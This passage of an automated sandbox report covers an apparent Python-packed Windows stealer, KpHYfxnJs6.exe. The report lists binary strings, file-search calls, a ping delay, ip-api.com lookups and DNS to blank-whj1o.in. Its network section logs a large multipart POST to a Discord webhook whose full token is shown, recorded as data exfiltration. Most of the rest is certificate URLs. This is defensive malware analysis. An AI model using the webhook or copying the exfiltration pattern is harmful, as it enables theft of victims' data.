              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1q 5 Jul 2022built on: Thu Aug 18 20:09:02 2022 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: KpHYfxnJs6.exe, 00000004.00000002.2897142653.000000006C0A3000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2902247843.000000006F861000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\sqlite3.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006D.00000000.2746843353.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp, rar.exe, 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
              Source: Binary string: D:\a\1\b\bin\win32\_sqlite3.pdb source: KpHYfxnJs6.exe, 00000004.00000002.2902609939.000000006F881000.00000040.00000001.01000000.0000000C.sdmp
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA446EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,109_2_00007FF6FAA446EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA3E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,109_2_00007FF6FAA3E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA888E0 FindFirstFileExA,109_2_00007FF6FAA888E0

              Networking

              barindex
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 3
              Source: unknownDNS query: name: ip-api.com
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
              Source: KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: KpHYfxnJs6.exe, 00000004.00000002.2894662678.00000000080D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: blank-whj1o.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1325289657537396889/J06FnIZUAv7ve4gZB3OnZqf37kI5zFxJAxHAJD7bveXtJPDaio_xou6MvVt3E_xErz6c HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 757556User-Agent: python-urllib3/2.3.0Content-Type: multipart/form-data; boundary=be021ac6dd6a6f9463cea33afec2e4d4
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 05 Jan 2025 06:20:00 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1736058001x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zw5vSBldi9iOW%2B9eohdvopcKIAWFYHRKodKbFFkuEUzy6NjtAeQYt%2BV0q9gfoFdO%2F3nGXOF%2BcBDredMg2V2D2z5kQySEIm6wi2C5gtsOEXVdIv4eJe8aFfj1Uo95"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=5cbfc4dd6375ebbad0e3f09fa787817f5ba62106-1736058000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=bS8fx30a016BJMMg6M7LZNH.avt_AGjRctIj0yxJamY-1736058000314-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8fd15c226cc4429d-EWR
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000002.2912329036.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000002.2912329036.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000002.2886740253.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621613704.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880087065.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674550956.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485343382.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743962657.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2677988442.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2652879260.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684053799.0000000007628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: powershell.exe, 0000000E.00000002.2554661675.0000000007ACC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000002.2912329036.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048545047.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051539715.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049199984.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051232458.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049126922.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050014254.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048677870.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048894241.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048387403.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: KpHYfxnJs6.exe, 00000000.00000003.2048263051.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2049009582.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2051327825.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050368927.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2048772662.00000000050F2000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050553883.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000000.00000003.2050279339.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: KpHYfxnJs6.exe, 00000004.00000003.2744996096.0000000004E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2484058044.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621699329.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.0000000007607000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.0000000007606000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2745181563.000000000760B000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880829085.000000000760D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485343382.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886692444.0000000007611000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484414365.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744799637.0000000007604000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2678320239.0000000007606000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881487113.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2616436229.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2623954278.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2604998063.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485485628.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484622291.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886303879.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2636804800.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.000000000759F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
